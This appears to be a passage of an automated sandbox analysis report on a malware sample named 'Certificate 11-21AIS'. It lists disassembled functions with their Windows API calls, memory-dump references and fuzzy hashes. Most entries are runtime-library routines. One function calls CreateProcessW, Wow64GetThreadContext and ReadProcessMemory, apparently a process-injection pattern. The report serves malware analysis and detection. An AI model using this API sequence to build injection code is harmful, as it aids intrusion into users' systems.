                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: 2e45fcdc77c34861bbb4119a7b854e4b19ac6d8cd6b5908f7f7a9348d08d74a8
                                                                              • Instruction ID: 429e1e3d7c6eb5c8c969c893142d6d77a9a437ac38b5ee1bd0b138e57790d0ff
                                                                              • Opcode Fuzzy Hash: 2e45fcdc77c34861bbb4119a7b854e4b19ac6d8cd6b5908f7f7a9348d08d74a8
                                                                              • Instruction Fuzzy Hash: 5EE0863A146214BBD7211F54AC09FCE7B18AB0AB64F104210FF14690E097B125119798
                                                                              Function 0090BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0090BB72
                                                                                • Part of subcall function 008E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,008E7A85), ref: 008E1CB1
                                                                                • Part of subcall function 008E1C9D: GetLastError.KERNEL32(00000000,?,008E7A85), ref: 008E1CC3
                                                                              • _free.LIBCMT ref: 0090BB83
                                                                              • _free.LIBCMT ref: 0090BB95
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                              • Instruction ID: ac84544b6a5f00c6f2fd523611b0958038b4259029f23d9b903357247a253c66
                                                                              • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                              • Instruction Fuzzy Hash: E0E012B26417818BDE24657E6E4CEB323CC9F05355724081DB459E7186CF34E84085A4
                                                                              Function 008C2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008C24F1), ref: 008C2303
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008C25A1
                                                                              • CoInitialize.OLE32(00000000), ref: 008C2618
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0093503A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID:
                                                                              • API String ID: 3815369404-0
                                                                              • Opcode ID: 082a3e56ec7c4721b56d85f29078c3341ba3dc8552726843453200e269f9e0e6
                                                                              • Instruction ID: d3ab2ec1264865d7b213a127f60a8dcde15f9d8b86b6721be2d2b891363c93a4
                                                                              • Opcode Fuzzy Hash: 082a3e56ec7c4721b56d85f29078c3341ba3dc8552726843453200e269f9e0e6
                                                                              • Instruction Fuzzy Hash: 2371AFB59293458BC714EF6EE994999BBFCFB99344780412EE129C77B2CB308402EF15
                                                                              Function 00920828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _strcat.LIBCMT ref: 009208FD
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • _wcscpy.LIBCMT ref: 0092098C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1012013722-0
                                                                              • Opcode ID: 9b39d90fcb560dce360148a5ea248b4095fd5336fd519c4c99921d1c9b5834ce
                                                                              • Instruction ID: c6eda9df6115d2fdb73fe730d644ec3203f303eca8a14d682c4d078f5b07490e
                                                                              • Opcode Fuzzy Hash: 9b39d90fcb560dce360148a5ea248b4095fd5336fd519c4c99921d1c9b5834ce
                                                                              • Instruction Fuzzy Hash: 9F913734A00614DFCB18DF28D495A69B7F5FF89310B90846AE85ACF3A6DB34ED41CB81
                                                                              Function 008C3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsThemeActive.UXTHEME ref: 008C3A73
                                                                                • Part of subcall function 008E1405: __lock.LIBCMT ref: 008E140B
                                                                                • Part of subcall function 008C3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008C3AF3
                                                                                • Part of subcall function 008C3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008C3B08
                                                                                • Part of subcall function 008C3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008C3AA3,?), ref: 008C3D45
                                                                                • Part of subcall function 008C3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,008C3AA3,?), ref: 008C3D57
                                                                                • Part of subcall function 008C3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00981148,00981130,?,?,?,?,008C3AA3,?), ref: 008C3DC8
                                                                                • Part of subcall function 008C3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,008C3AA3,?), ref: 008C3E48
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008C3AB3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                              • String ID:
                                                                              • API String ID: 924797094-0
                                                                              • Opcode ID: 555c62d7abd6eff58f07337570bb3e41060f7efd25cb17cb97c91b1eb91e0738
                                                                              • Instruction ID: 191bf66b6f7734fb19b8c7d50a11016dccd5363216a017cfc7972e3a513570a7
                                                                              • Opcode Fuzzy Hash: 555c62d7abd6eff58f07337570bb3e41060f7efd25cb17cb97c91b1eb91e0738
                                                                              • Instruction Fuzzy Hash: 6A119D7152C3409BC300EF29EC05A0ABBE8FF95710F008A1EF584C33A1DB7089819B93
                                                                              Function 008EE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___lock_fhandle.LIBCMT ref: 008EEA29
                                                                              • __close_nolock.LIBCMT ref: 008EEA42
                                                                                • Part of subcall function 008E7BDA: __getptd_noexit.LIBCMT ref: 008E7BDA
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                              • String ID:
                                                                              • API String ID: 1046115767-0
                                                                              • Opcode ID: 8902d4317f079894b478783779d89f6f87f834ac13d708cd46908e3bf05cf208
                                                                              • Instruction ID: 6e791a2111228ea6e64ab371b262a6e55b12c95a7cf147aed6367e1bae4c6139
                                                                              • Opcode Fuzzy Hash: 8902d4317f079894b478783779d89f6f87f834ac13d708cd46908e3bf05cf208
                                                                              • Instruction Fuzzy Hash: AF11C672809AE58AD311BF6ED8413183A61FF93335F264364E820DF2E3D7B4880097A2
                                                                              Function 008DF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008E395C: __FF_MSGBANNER.LIBCMT ref: 008E3973
                                                                                • Part of subcall function 008E395C: __NMSG_WRITE.LIBCMT ref: 008E397A
                                                                                • Part of subcall function 008E395C: RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F
                                                                              • std::exception::exception.LIBCMT ref: 008DF51E
                                                                              • __CxxThrowException@8.LIBCMT ref: 008DF533
                                                                                • Part of subcall function 008E6805: RaiseException.KERNEL32(?,?,0000000E,00976A30,?,?,?,008DF538,0000000E,00976A30,?,00000001), ref: 008E6856
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3902256705-0
                                                                              • Opcode ID: f92691be497fbf685b1e89045504cd9a8a5acc3f367b029e01bffad0cc3647fa
                                                                              • Instruction ID: a6467cda346b06f3950da57a0d573e4b926d7e01afe6f8c330f9d428a6a6e646
                                                                              • Opcode Fuzzy Hash: f92691be497fbf685b1e89045504cd9a8a5acc3f367b029e01bffad0cc3647fa
                                                                              • Instruction Fuzzy Hash: ABF0813110425EA7DB14BF9DE80199E7BE8FF02354F604226FA09D2282DBB0965096A6
                                                                              Function 008E35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • __lock_file.LIBCMT ref: 008E3629
                                                                                • Part of subcall function 008E4E1C: __lock.LIBCMT ref: 008E4E3F
                                                                              • __fclose_nolock.LIBCMT ref: 008E3634
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: 97e895058b01db93d447a56f9a93c1011f6b2bf39cc898ceddeda2c23b0f8dba
                                                                              • Instruction ID: 03fde320d666b026e1160cbabc49272e5d6c5b293e65b6a8eed2e1ba206cdd8d
                                                                              • Opcode Fuzzy Hash: 97e895058b01db93d447a56f9a93c1011f6b2bf39cc898ceddeda2c23b0f8dba
                                                                              • Instruction Fuzzy Hash: D2F0BB31801695BAD7117BBB880A76E76A0FF63334F258108E415EB2E1C77C8E01AB56
                                                                              Function 011B3F1D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 011B46DB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B4771
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B4793
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                              • Instruction ID: d1ba3f8529014bac3b3b480709c8198c47ba8e5bfd1e29d3cdfc51f37275958f
                                                                              • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                              • Instruction Fuzzy Hash: 4C12CE24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4E81CF5A
                                                                              Function 008E2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __flush.LIBCMT ref: 008E2A0B
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __flush__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 4101623367-0
                                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                              • Instruction ID: 510a49c18cb75d9d7615ec7721d70721c06be144db6c82b1b71c3c45bbe0fe62
                                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                              • Instruction Fuzzy Hash: 024193716007969FDB2C9E6BC8819AE7BAEFF46360B24853DE855C7241EB70DD418B40
                                                                              Function 008DED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: 805bba326850f9dc3ca846993eecca31ad5b0a9000166e2ccf64b63225543862
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 1531B174A001099BD718EF5CC480A69FBB6FB49344B6487A6E40ACF366DB31EDC1CB90
                                                                              Function 00939A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: fb1c44edeb5338ea9fb432be1de0d534bacdfaf656ab8f7886008ceff83b76ac
                                                                              • Instruction ID: 3bc48cbe100256e0f7a50833d6bfdb0aa3dbbadbf7fd3fa3a21c55d0f94b687d
                                                                              • Opcode Fuzzy Hash: fb1c44edeb5338ea9fb432be1de0d534bacdfaf656ab8f7886008ceff83b76ac
                                                                              • Instruction Fuzzy Hash: 88415B745046458FDB24CF18C484B1ABBF1FF45308F198AADE99A8B362C376E845DF52
                                                                              Function 008C41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C4214: FreeLibrary.KERNEL32(00000000,?), ref: 008C4247
                                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008C39FE,?,00000001), ref: 008C41DB
                                                                                • Part of subcall function 008C4291: FreeLibrary.KERNEL32(00000000), ref: 008C42C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Free$Load
                                                                              • String ID:
                                                                              • API String ID: 2391024519-0
                                                                              • Opcode ID: 46298b96c20b63bb4537ecdc4dfc6fe40f5a896b907682eea0c9f7ba9bf0db31
                                                                              • Instruction ID: fa294c00d61b4897a0515a25941a0ff7c6d96e3fe0a70d8105b86353b8852d44
                                                                              • Opcode Fuzzy Hash: 46298b96c20b63bb4537ecdc4dfc6fe40f5a896b907682eea0c9f7ba9bf0db31
                                                                              • Instruction Fuzzy Hash: 5611C131600206AACB10AB78DC27F9E77B9EF80704F10842DB596E61C1DB70DA809B62
                                                                              Function 00939B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 04b4491c6c034e304ffd5beace58eeda79f9ecde2b0be9ec285c12822de77a40
                                                                              • Instruction ID: 10dde23c1407dc9b811af781b6b20b17b73ce21e9c58b3842b6bf18398a0988b
                                                                              • Opcode Fuzzy Hash: 04b4491c6c034e304ffd5beace58eeda79f9ecde2b0be9ec285c12822de77a40
                                                                              • Instruction Fuzzy Hash: 7A2113705086058FDB24DF68D484B1ABBF1FF84304F144A6EEA9A8B362C732E845DF52
                                                                              Function 008EAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___lock_fhandle.LIBCMT ref: 008EAFC0
                                                                                • Part of subcall function 008E7BDA: __getptd_noexit.LIBCMT ref: 008E7BDA
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                                              • String ID:
                                                                              • API String ID: 1144279405-0
                                                                              • Opcode ID: abd9f7acd942dabb2a04648aabcb2a2153977b7be34fbc52c469272c5377155f
                                                                              • Instruction ID: c82d2e714370a112a93928273ba4da5f179310f9c60cbb6a7717f041b5d7c361
                                                                              • Opcode Fuzzy Hash: abd9f7acd942dabb2a04648aabcb2a2153977b7be34fbc52c469272c5377155f
                                                                              • Instruction Fuzzy Hash: CD11B272804AD49FD7126FAA980176A3A60FF83335F254250E434DB1E3DBB4AD009BA2
                                                                              Function 008C39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                              • Instruction ID: 0cb3e3041c8c82844ca15c53d0a0b7af48076d8df992e045d2b9c1e1521c1203
                                                                              • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                              • Instruction Fuzzy Hash: 1001127150010DAECF05EF64C892DEEBB78FB11344F108129B556D61A5EA30DA89DF61
                                                                              Function 008E2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 008E2AED
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
